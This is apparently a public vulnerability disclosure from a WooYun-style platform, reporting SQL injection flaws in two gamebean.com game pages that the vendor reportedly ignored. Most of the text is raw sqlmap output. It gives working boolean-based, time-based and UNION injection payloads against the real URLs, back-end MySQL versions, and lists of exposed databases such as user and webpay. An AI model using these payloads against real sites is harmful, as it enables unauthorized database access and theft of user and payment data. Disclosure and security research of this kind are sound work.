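2016-01-18: Details reported to the vendor; awaiting vendor handling.
2016-01-23: The vendor has actively ignored the vulnerability; details disclosed to the public.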
http://game.gamebean.com/pdmodel_list.php?model=1&s=31&channel=A307
sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
---
Parameter: model (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: model=1 AND 1104=1104&s=31&channel=A307

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: model=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BKFW)&s=31&channel=A307

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: model=1 UNION ALL SELECT NULL,CONCAT(0x716b6b7a71,0x7a467477484b516e4b65,0x716a787171),NULL-- &s=31&channel=A307
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12

available databases [3]:
[*] information_schema
[*] ssfee_platform
[*] test

Database: ssfee_platform
[519 tables]
http://long.gamebean.com/game_enter.php?s_id=1
sqlmap identified the following injection points with a total of 217 HTTP(s) requests:
---
Parameter: s_id (GET)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: s_id=-3250' UNION ALL SELECT NULL,CONCAT(0x7162786a71,0x4762687879465a6b576f,0x717a6b7871)#
---
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL >= 5.0.0

available databases [25]:
[*] aa
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws
Severity: No impact (ignored by vendor)
Ignored at: 2016-01-23 15:40
Vulnerability Rank: 4 (WooYun rating)
None yet